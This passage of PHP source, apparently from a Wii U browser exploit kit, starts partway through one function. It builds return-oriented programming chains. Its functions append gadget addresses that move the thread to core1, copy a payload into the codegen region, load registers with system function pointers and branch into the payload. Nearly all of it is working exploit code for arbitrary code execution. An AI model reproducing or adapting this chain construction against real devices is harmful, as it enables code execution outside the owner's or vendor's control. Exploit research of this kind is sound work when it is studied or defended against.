); ropchain_appendu32($r28);//r28 ropchain_appendu32(0x0);//r29 ropchain_appendu32(0x0);//r30 ropchain_appendu32(0x0);//r31 ropchain_appendu32(0x0); ropgen_OSFatal($outstr); }

/**
 * Append the "move this thread to core1" sequence to the ROP chain being built.
 *
 * Uses the following globals (gadget/function addresses supplied by the
 * including file): $ROP_OSGetCurrentThread, $ROP_OSSetThreadAffinity,
 * $ROP_OSYieldThread, $ROP_CALLR28_POP_R28_TO_R31.
 *
 * The sequence is: one ropgen_callfunc() that (per the original author's note)
 * obtains the current OSThread* and stages the r28/r31 values for the
 * OSSetThreadAffinity(, 0x2) call, followed by two CALLR28 / pop r28..r31
 * frames — the first with OSYieldThread in r28, the second all-zero.
 * The original note records that OSSetThreadAffinity() currently returns an
 * error here, so in practice the chain must already be running on core1.
 */
function ropgen_switchto_core1() {
  global $ROP_OSGetCurrentThread, $ROP_OSSetThreadAffinity, $ROP_OSYieldThread, $ROP_CALLR28_POP_R28_TO_R31;

  // r3 = current OSThread*; r31 and the r28 value consumed by the frames below are set up here.
  ropgen_callfunc($ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, $ROP_OSSetThreadAffinity);

  // Two consecutive pop-r28..r31 frames, each: gadget, r28, r29, r30, r31, one extra word.
  $frameWords = array(
    $ROP_CALLR28_POP_R28_TO_R31,   // -> OSSetThreadAffinity(, 0x2)
    $ROP_OSYieldThread,            // r28
    0x0,                           // r29
    0x0,                           // r30
    0x0,                           // r31
    0x0,
    $ROP_CALLR28_POP_R28_TO_R31,
    0x0,                           // r28
    0x0,                           // r29
    0x0,                           // r30
    0x0,                           // r31
    0x0,
  );
  foreach ($frameWords as $word) {
    ropchain_appendu32($word);
  }
}

/**
 * Build the "type1" ROP chain: switch to core1, copy the payload into the
 * codegen region, load r24..r31 with a register-based parameter block, then
 * branch to the codegen address.
 *
 * Requires the including file to define $payload_srcaddr (the payload's
 * source address) plus the gadget/function address globals listed below.
 * Nothing here validates that $payload_srcaddr is set; an undefined value
 * would be appended as-is.
 */
function generateropchain_type1() {
  global $ROP_OSFatal, $ROP_Exit, $ROP_OSDynLoad_Acquire, $ROP_OSDynLoad_FindExport, $ROP_os_snprintf, $payload_srcaddr, $ROPHEAP;

  // Length passed to the copy; per the original note it need not match the real payload size exactly.
  $copyLength = 0x20000;
  $codegenBase = 0x01800000;

  // Under the browser only core1 may use codegen, so move there first. The original note
  // records that OSSetThreadAffinity() currently fails, making this chain usable only when
  // it is already executing on core1.
  ropgen_switchto_core1();

  ropgen_copycodebin_to_codegen($codegenBase, $payload_srcaddr, $copyLength);

  // Register "paramblk": index i corresponds to r(24 + i) at payload entry. This is the only
  // way to hand the payload parameters with the gadgets this codebase currently uses.
  $entryRegs = array(
    $ROP_OSFatal,               // r24
    $ROP_Exit,                  // r25
    $ROP_OSDynLoad_Acquire,     // r26
    $ROP_OSDynLoad_FindExport,  // r27
    $ROP_os_snprintf,           // r28
    0x0,                        // r29
    0x0,                        // r30
    $ROPHEAP,                   // r31
  );
  ropgen_pop_r24_to_r31($entryRegs);

  // Final return address: the codegen region the payload was copied into.
  ropchain_appendu32($codegenBase);
}
?>